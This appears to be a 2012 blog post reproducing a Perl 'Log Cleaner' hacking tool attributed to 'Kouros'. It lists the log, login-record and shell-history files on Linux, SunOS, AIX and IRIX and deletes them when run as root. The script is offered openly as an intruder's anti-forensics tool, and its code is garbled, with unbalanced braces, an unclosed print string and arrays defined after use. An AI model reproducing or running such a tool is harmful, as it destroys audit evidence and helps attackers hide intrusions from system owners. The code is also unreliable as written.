febrero 11, 2012


#!usr/bin/perl -w #Warnings enabled!
#Log cleaner version Public
#Give Credits Where Needed - Kouros!
#This took time, Hope you fucking use it :D
#Report bugs to info@Kouros-bl4ckhat.com
print qq^
# Log Cleaner 3.0 PUBLIC #
# Kouros #
# #
# Virangar Security Team #
# http://www.Kouros-bl4ckhat.com #
while(1) {
print "Enter Which OS: "; #User Input
chomp($os = <STDIN>); #Takes it into memory
if($os eq "help"){
print "[+]Enter Your OS! Choose from 'linux', 'aix', 'sunos', 'irix'\n";
print "[+]Hit enter with OS, Let the script do its work\n";
print "[+]Note: You MUST Be Root!\n";
print "[+]Contact Info[at]Kouros-bl4ckhat [dot] Com";
print "[+]For Bug finds... Have Fun!\n";
print "[+] - Kouros";
if($os eq "linux"){ #If linux typed, do the following and start brackets
foreach my $logphile(@linux) {
unlink($logphile) || print "[-]Fucked up: \"$logphile\" : $!\n";
} elsif($os eq "sunos"){ #If sunos typed, do the following and start brackets
foreach my $logphile(@sunos) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
} elsif($os eq "aix"){ #If aix typed, do the following and start brackets
foreach my $logphile(@aix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
} elsif($os eq "irix"){ #If irix typed, do the following and start bracket
foreach my $logphile(@irix) {
unlink($logphile) || print "[-] Fucked up: \"$logphile\" : $!\n";
} else { print"Umm WTF !?\n"; }
#Logs of Irix Systems
{ #Start Irix Bracket
@irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/",
"/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log",
"/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp",
"/var/adm/acct/sum/loginlog", "var/adm/X0msgs", "/var/adm/crash/vmcore",
"/var/adm/crash/unix") #End Array
} #End Irix Bracket
#Log sof Aix Systems
{ #Start Aix Bracket
@aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", "/var/adm/qacct",
"/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog",
"/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog",
"/etc/security/failedlogin", "usr/spool/mqueue/syslog") #End Array
} #End Aix Bracket
#Logs of SunOS Systems
{ #Start SunOS Bracket
@sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog",
"/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp",
"/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx",
"/var/adm/log/asppp.log", "/var/log/syslog",
"/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct",
"/var/lp/logs/lpsched", "/var/lp/logs/requests",
"/var/cron/logs", "/var/saf/_log", "/var/saf/port/log") #End Array
} #End Sunos bracket
#Logs of Linux Systems
{ #Start Linux Bracket
@linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp",
"/var/log/secure","/root/.ksh_history", "/root/.bash_history",
"/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp",
"/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
"/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
"/var/log/proftpd.xferlog", "/var/log/proftpd.access_log",
"/var/log/httpd/error_log", "/var/log/httpsd/ssl_log",
"/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority",
"/var/log/poplog", "/var/log/news.all", "/var/log/spooler",
"/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err",
"/var/log/news/suck.err", "/var/log/news/suck.notice",
"/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks",
"/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log",
"/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs",
"/var/log/auth") #End array
} #End linux bracket
} #Ends Loop